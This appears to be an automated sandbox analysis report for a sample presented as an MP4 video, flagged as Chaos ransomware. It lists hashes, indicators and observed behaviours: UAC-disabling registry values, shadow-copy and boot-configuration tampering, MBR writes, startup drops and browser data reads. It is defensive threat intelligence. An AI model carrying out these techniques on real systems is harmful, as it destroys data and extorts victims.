Analysis
-
max time kernel
425s -
max time network
426s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-12-2024 14:37
Static task
static1
Behavioral task
behavioral1
Sample
Sols RNG [Eon 1-1] - ROLLING OBLIVION IN GLITCH BIOME!!! (WITH REACTION) 480.mp4
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Sols RNG [Eon 1-1] - ROLLING OBLIVION IN GLITCH BIOME!!! (WITH REACTION) 480.mp4
Resource
win10v2004-20241007-en
Errors
General
-
Target
Sols RNG [Eon 1-1] - ROLLING OBLIVION IN GLITCH BIOME!!! (WITH REACTION) 480.mp4
-
Size
8.1MB
-
MD5
7a922dc11e75f0a29f8301a7c7618c2b
-
SHA1
a147bf976557d00e7bf0dcbaf7e43fec5277d9e6
-
SHA256
b20976ed9b7d2c8cab61375a83d302258858ee57b5f497a431763b1a8e9ca2dc
-
SHA512
48e08ab89618b6eb4ef86929e5e176d103d9c28909cfeaa47e457e7a7233f2cf1886bcb07abd38dbddf7fae5b224312a8112061ec994b9a38e6980f1ed8c921b
-
SSDEEP
196608:HsIcL0wGqPi/xOuRu40kE/afekLeZl4zuKQXlRSqesHnaE+YR:HHwbKc4FE/a3Sl1Xnx6EP
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 4 IoCs
resource yara_rule behavioral2/files/0x0007000000023db3-831.dat family_chaos behavioral2/memory/5496-840-0x00000000008B0000-0x00000000008D0000-memory.dmp family_chaos behavioral2/memory/2212-918-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos behavioral2/memory/2212-923-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos -
Chaos family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5248 bcdedit.exe 5288 bcdedit.exe -
pid Process 5456 wbadmin.exe -
Disables Task Manager via registry modification
-
A potential corporate email address has been identified in the URL: [email protected]
-
A potential corporate email address has been identified in the URL: [email protected]
-
A potential corporate email address has been identified in the URL: [email protected]
-
A potential corporate email address has been identified in the URL: [email protected]
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Cov29Cry.exe -
Drops startup file 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe -
Executes dropped EXE 4 IoCs
pid Process 5384 mbr.exe 5496 Cov29Cry.exe 5900 svchost.exe 5464 Cov29LockScreen.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3442511616-637977696-3186306149-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: unregmp2.exe File opened (read-only) \??\Q: unregmp2.exe File opened (read-only) \??\V: unregmp2.exe File opened (read-only) \??\X: unregmp2.exe File opened (read-only) \??\E: wmplayer.exe File opened (read-only) \??\N: wmplayer.exe File opened (read-only) \??\Q: wmplayer.exe File opened (read-only) \??\G: unregmp2.exe File opened (read-only) \??\Y: wmplayer.exe File opened (read-only) \??\W: wmplayer.exe File opened (read-only) \??\P: wmplayer.exe File opened (read-only) \??\A: wmplayer.exe File opened (read-only) \??\J: unregmp2.exe File opened (read-only) \??\S: unregmp2.exe File opened (read-only) \??\G: wmplayer.exe File opened (read-only) \??\S: wmplayer.exe File opened (read-only) \??\E: unregmp2.exe File opened (read-only) \??\P: unregmp2.exe File opened (read-only) \??\R: unregmp2.exe File opened (read-only) \??\Y: unregmp2.exe File opened (read-only) \??\H: wmplayer.exe File opened (read-only) \??\Z: wmplayer.exe File opened (read-only) \??\A: unregmp2.exe File opened (read-only) \??\O: unregmp2.exe File opened (read-only) \??\I: wmplayer.exe File opened (read-only) \??\K: unregmp2.exe File opened (read-only) \??\M: unregmp2.exe File opened (read-only) \??\N: unregmp2.exe File opened (read-only) \??\T: unregmp2.exe File opened (read-only) \??\Z: unregmp2.exe File opened (read-only) \??\K: wmplayer.exe File opened (read-only) \??\O: wmplayer.exe File opened (read-only) \??\B: unregmp2.exe File opened (read-only) \??\U: unregmp2.exe File opened (read-only) \??\W: unregmp2.exe File opened (read-only) \??\B: wmplayer.exe File opened (read-only) \??\L: wmplayer.exe File opened (read-only) \??\L: unregmp2.exe File opened (read-only) \??\J: wmplayer.exe File opened (read-only) \??\M: wmplayer.exe File opened (read-only) \??\R: wmplayer.exe File opened (read-only) \??\T: wmplayer.exe File opened (read-only) \??\U: wmplayer.exe File opened (read-only) \??\V: wmplayer.exe File opened (read-only) \??\X: wmplayer.exe File opened (read-only) \??\I: unregmp2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 235 raw.githubusercontent.com 236 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mbr.exe -
Probable phishing domain 1 TTPs 1 IoCs
description flow ioc stream HTTP URL 55 https://ads.luarmor.net/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8f60da3389c9951a 3 -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\s84mxci6g.jpg" svchost.exe -
resource yara_rule behavioral2/memory/2212-796-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral2/memory/2212-918-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral2/memory/2212-923-0x0000000000400000-0x00000000005D5000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll svchost.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mbr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmplayer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language unregmp2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cov29LockScreen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TrojanRansomCovid29.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1160 PING.EXE 5568 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5408 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5072 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "46" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3442511616-637977696-3186306149-1000\{FAF25A11-D6BC-4AD1-8B1B-F17ECFD48C35} wmplayer.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings svchost.exe -
Modifies registry key 1 TTPs 7 IoCs
pid Process 5348 reg.exe 5172 reg.exe 5204 reg.exe 5220 reg.exe 5236 reg.exe 5312 reg.exe 5332 reg.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 5568 PING.EXE 1160 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5900 svchost.exe -
Suspicious behavior: EnumeratesProcesses 63 IoCs
pid Process 8 msedge.exe 8 msedge.exe 1460 msedge.exe 1460 msedge.exe 3160 identity_helper.exe 3160 identity_helper.exe 2724 msedge.exe 2724 msedge.exe 2376 msedge.exe 2376 msedge.exe 3260 msedge.exe 3260 msedge.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5496 Cov29Cry.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5900 svchost.exe 5956 msedge.exe 5956 msedge.exe 5956 msedge.exe 5956 msedge.exe 5900 svchost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 35 IoCs
pid Process 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeShutdownPrivilege 324 wmplayer.exe Token: SeCreatePagefilePrivilege 324 wmplayer.exe Token: SeShutdownPrivilege 1864 unregmp2.exe Token: SeCreatePagefilePrivilege 1864 unregmp2.exe Token: 33 1468 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1468 AUDIODG.EXE Token: SeShutdownPrivilege 324 wmplayer.exe Token: SeCreatePagefilePrivilege 324 wmplayer.exe Token: SeShutdownPrivilege 324 wmplayer.exe Token: SeCreatePagefilePrivilege 324 wmplayer.exe Token: SeShutdownPrivilege 5512 shutdown.exe Token: SeRemoteShutdownPrivilege 5512 shutdown.exe Token: SeDebugPrivilege 5496 Cov29Cry.exe Token: SeDebugPrivilege 5900 svchost.exe Token: SeBackupPrivilege 4564 vssvc.exe Token: SeRestorePrivilege 4564 vssvc.exe Token: SeAuditPrivilege 4564 vssvc.exe Token: SeIncreaseQuotaPrivilege 5512 WMIC.exe Token: SeSecurityPrivilege 5512 WMIC.exe Token: SeTakeOwnershipPrivilege 5512 WMIC.exe Token: SeLoadDriverPrivilege 5512 WMIC.exe Token: SeSystemProfilePrivilege 5512 WMIC.exe Token: SeSystemtimePrivilege 5512 WMIC.exe Token: SeProfSingleProcessPrivilege 5512 WMIC.exe Token: SeIncBasePriorityPrivilege 5512 WMIC.exe Token: SeCreatePagefilePrivilege 5512 WMIC.exe Token: SeBackupPrivilege 5512 WMIC.exe Token: SeRestorePrivilege 5512 WMIC.exe Token: SeShutdownPrivilege 5512 WMIC.exe Token: SeDebugPrivilege 5512 WMIC.exe Token: SeSystemEnvironmentPrivilege 5512 WMIC.exe Token: SeRemoteShutdownPrivilege 5512 WMIC.exe Token: SeUndockPrivilege 5512 WMIC.exe Token: SeManageVolumePrivilege 5512 WMIC.exe Token: 33 5512 WMIC.exe Token: 34 5512 WMIC.exe Token: 35 5512 WMIC.exe Token: 36 5512 WMIC.exe Token: SeIncreaseQuotaPrivilege 5512 WMIC.exe Token: SeSecurityPrivilege 5512 WMIC.exe Token: SeTakeOwnershipPrivilege 5512 WMIC.exe Token: SeLoadDriverPrivilege 5512 WMIC.exe Token: SeSystemProfilePrivilege 5512 WMIC.exe Token: SeSystemtimePrivilege 5512 WMIC.exe Token: SeProfSingleProcessPrivilege 5512 WMIC.exe Token: SeIncBasePriorityPrivilege 5512 WMIC.exe Token: SeCreatePagefilePrivilege 5512 WMIC.exe Token: SeBackupPrivilege 5512 WMIC.exe Token: SeRestorePrivilege 5512 WMIC.exe Token: SeShutdownPrivilege 5512 WMIC.exe Token: SeDebugPrivilege 5512 WMIC.exe Token: SeSystemEnvironmentPrivilege 5512 WMIC.exe Token: SeRemoteShutdownPrivilege 5512 WMIC.exe Token: SeUndockPrivilege 5512 WMIC.exe Token: SeManageVolumePrivilege 5512 WMIC.exe Token: 33 5512 WMIC.exe Token: 34 5512 WMIC.exe Token: 35 5512 WMIC.exe Token: 36 5512 WMIC.exe Token: SeDebugPrivilege 5072 taskkill.exe Token: SeBackupPrivilege 2980 wbengine.exe Token: SeRestorePrivilege 2980 wbengine.exe Token: SeSecurityPrivilege 2980 wbengine.exe -
Suspicious use of FindShellTrayWindow 52 IoCs
pid Process 324 wmplayer.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 5984 NOTEPAD.EXE -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 5464 Cov29LockScreen.exe 5372 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 324 wrote to memory of 208 324 wmplayer.exe 82 PID 324 wrote to memory of 208 324 wmplayer.exe 82 PID 324 wrote to memory of 208 324 wmplayer.exe 82 PID 208 wrote to memory of 1864 208 unregmp2.exe 83 PID 208 wrote to memory of 1864 208 unregmp2.exe 83 PID 1460 wrote to memory of 2276 1460 msedge.exe 89 PID 1460 wrote to memory of 2276 1460 msedge.exe 89 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 1872 1460 msedge.exe 90 PID 1460 wrote to memory of 8 1460 msedge.exe 91 PID 1460 wrote to memory of 8 1460 msedge.exe 91 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 PID 1460 wrote to memory of 2428 1460 msedge.exe 92 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\Sols RNG [Eon 1-1] - ROLLING OBLIVION IN GLITCH BIOME!!! (WITH REACTION) 480.mp4"1⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵
- Drops file in Windows directory
PID:816
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x498 0x5101⤵
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1460 -
